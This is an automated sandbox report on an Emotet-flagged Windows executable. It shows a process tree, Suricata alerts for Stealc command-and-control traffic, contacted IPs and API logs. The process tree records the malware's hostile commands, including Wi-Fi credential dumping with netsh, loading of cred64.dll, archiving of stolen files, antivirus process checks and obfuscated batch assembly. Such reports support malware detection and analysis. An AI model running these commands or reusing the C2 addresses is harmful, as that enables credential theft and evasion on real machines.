Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 8, 2025, 12:08 p.m.	March 8, 2025, 12:31 p.m.

Size	5.4MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`4677605b34f1e7f4b7c691bd1fddb6a3`
SHA256	`d532136082788939654457efbf935976af743ef0830e197da6e6dd6ef8ece6b2`
CRC32	`9F139278`
ssdeep	`98304:nxZpfpcWlmFfn/wT8k2l4jEOQjABqKHgAyCwNeZn2bNCxtwBEIMjL:nZpfaYTkl4K2ldMNeZn2bNCH+`
PDB Path	wextract.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet IsPE32 - (no description) UPX_Zero - UPX packed file

download.php "C:\Users\test22\AppData\Local\Temp\download.php"
724
- J5j65.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\J5j65.exe
  2056
  - 1N22O8.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1N22O8.exe
    2124
    - rapes.exe "C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2356
      - zY9sqWs.exe "C:\Users\test22\AppData\Local\Temp\10075800101\zY9sqWs.exe"
        2172
        
        Gxtuum.exe "C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
        2320
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
        2088
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
        2208
        
        netsh.exe netsh wlan show profiles
        2340
        
        powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
        296
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll, Main
        1688
      - v6Oqdnc.exe "C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
        2344
      - HmngBpR.exe "C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe"
        2488
      - ADFoyxP.exe "C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe"
        2028
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
        1800
        
        expand.exe expand Go.pub Go.pub.bat
        316
        
        tasklist.exe tasklist
        2012
        
        findstr.exe findstr /I "opssvc wrsa"
        2564
        
        tasklist.exe tasklist
        516
        
        findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        2516
        
        cmd.exe cmd /c md 353090
        1656
        
        extrac32.exe extrac32 /Y /E Really.pub
        2408
        
        findstr.exe findstr /V "posted" Good
        1520
        
        cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
        2772
        
        cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
        2548
        
        Seat.com Seat.com m
        1972
        
        choice.exe choice /d y /t 5
        1208
      - 9hUDDVk.exe "C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe"
        1200
      - pwHxMTy.exe "C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe"
        1504
      - T0QdO0l.exe "C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe"
        880
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
        2840
      - amnew.exe "C:\Users\test22\AppData\Local\Temp\10121660101\amnew.exe"
        1964
        
        futors.exe "C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe"
        2824
      - yUI6F6C.exe "C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe"
        916
      - CgmaT61.exe "C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe"
        2376
      - 9zQZD2e.exe "C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe"
        3120
        
        cmd.exe cmd.exe /c 67cb736da8518.vbs
        3168
      - V0Bt74c.exe "C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe"
        3248
  - 2q1116.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2q1116.exe
    2404
- 3H65J.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3H65J.exe
  2552
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
github.com	A 20.200.245.247	20.200.245.247

IP Address	Status	Action
164.124.101.2	Active	Moloch
176.113.115.6	Active	Moloch
176.113.115.7	Active	Moloch
185.125.50.8	Active	Moloch
185.215.113.16	Active	Moloch
185.215.113.209	Active	Moloch
185.215.113.97	Active	Moloch
20.200.245.247	Active	Moloch
45.93.20.28	Active	Moloch
45.33.6.223	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 45.93.20.28:80 -> 192.168.56.103:49168	2400003	ET DROP Spamhaus DROP Listed Traffic Inbound group 4	Misc Attack
TCP 192.168.56.103:49168 -> 45.93.20.28:80	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 45.93.20.28:80	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	Malware Command and Control Activity Detected
TCP 45.93.20.28:80 -> 192.168.56.103:49168	2051828	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config M1	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 45.93.20.28:80	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	Malware Command and Control Activity Detected
TCP 45.93.20.28:80 -> 192.168.56.103:49168	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 45.93.20.28:80	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 45.93.20.28:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 45.93.20.28:80	2044301	ET HUNTING HTTP GET Request for sqlite3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 176.113.115.7:80 -> 192.168.56.103:49170	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49170	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49170	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 45.93.20.28:80 -> 192.168.56.103:49168	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.93.20.28:80 -> 192.168.56.103:49168	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2044303	ET HUNTING HTTP GET Request for freebl3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 45.93.20.28:80 -> 192.168.56.103:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.93.20.28:80 -> 192.168.56.103:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2044302	ET HUNTING HTTP GET Request for mozglue.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49177 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 45.93.20.28:80 -> 192.168.56.103:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49177	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49177	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2044305	ET HUNTING HTTP GET Request for nss3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49179 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49179	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 185.125.50.8:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 185.125.50.8:80 -> 192.168.56.103:49175	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.125.50.8:80 -> 192.168.56.103:49175	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2044306	ET HUNTING HTTP GET Request for softokn3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 45.93.20.28:80	2044307	ET HUNTING HTTP GET Request for vcruntime140.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49186 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49186	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49186	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49186	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 185.125.50.8:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49193	2014819	ET INFO Packed Executable Download	Misc activity
TCP 176.113.115.7:80 -> 192.168.56.103:49193	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49193	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49193	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49208	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49208	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49208	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49211 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49211	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49211	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49211	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 176.113.115.7:80	2032162	ET INFO PS1 Powershell File Request	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49215	2400030	ET DROP Spamhaus DROP Listed Traffic Inbound group 31	Misc Attack
TCP 192.168.56.103:49215 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49215	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.16:80 -> 192.168.56.103:49215	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.103:49215	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49211 -> 176.113.115.7:80	2032162	ET INFO PS1 Powershell File Request	Potentially Bad Traffic
TCP 185.215.113.209:80 -> 192.168.56.103:49219	2400030	ET DROP Spamhaus DROP Listed Traffic Inbound group 31	Misc Attack
TCP 192.168.56.103:49217 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49217	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49217	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49217	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49221 -> 20.200.245.247:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
ICMP 185.215.113.97:None -> 192.168.56.103:None	2400030	ET DROP Spamhaus DROP Listed Traffic Inbound group 31	Misc Attack
TCP 192.168.56.103:49226 -> 20.200.245.247:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49227 -> 20.200.245.247:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49233 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49233	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49233	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49233	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 20.200.245.247:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49225 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49225	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.103:49225	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49233 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49225	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49233	2014819	ET INFO Packed Executable Download	Misc activity
TCP 176.113.115.7:80 -> 192.168.56.103:49233	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.103:49233	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 20.200.245.247:443 -> 192.168.56.103:49228	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 20.200.245.247:443 -> 192.168.56.103:49223	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (23 events)

Time & API	Arguments	Status	Return
GetComputerNameA March 8, 2025, 12:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 8, 2025, 12:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 8, 2025, 12:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:09 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 8, 2025, 12:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 8, 2025, 12:10 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 94 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:08 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:09 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:10 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:10 p.m.			0	0
IsDebuggerPresent March 8, 2025, 12:10 p.m.			0	0

Command line console output was observed (50 out of 2598 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: Set console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: Marriott=x console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: RsModerators console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Eau(Encounter( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'RsModerators' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: XaObserver console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Downtown(Bbw(Statistics( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'XaObserver' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: ImViOc console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Gives(Ml(Logan(Phrase(Arch(Michael(Census(Teens( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'ImViOc' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: aujPrivacy console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Diabetes(Remind(Minister( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'aujPrivacy' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: xxQNCoins console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Shield( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'xxQNCoins' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: Set console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: Attachment=X console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: CsgkTranslations console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Broke(Courses(Leone(Acid(Cv( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'CsgkTranslations' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: HsPete console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Cruises(Opponents(Inform( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'HsPete' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: ZtPrecise console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Tvcom( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'ZtPrecise' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: sGVDialogue console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: (Contributions(Anime(Accounts( console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: 'sGVDialogue' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 8, 2025, 12:09 p.m.	buffer: gIHilton console_handle: 0x00000007	1	1
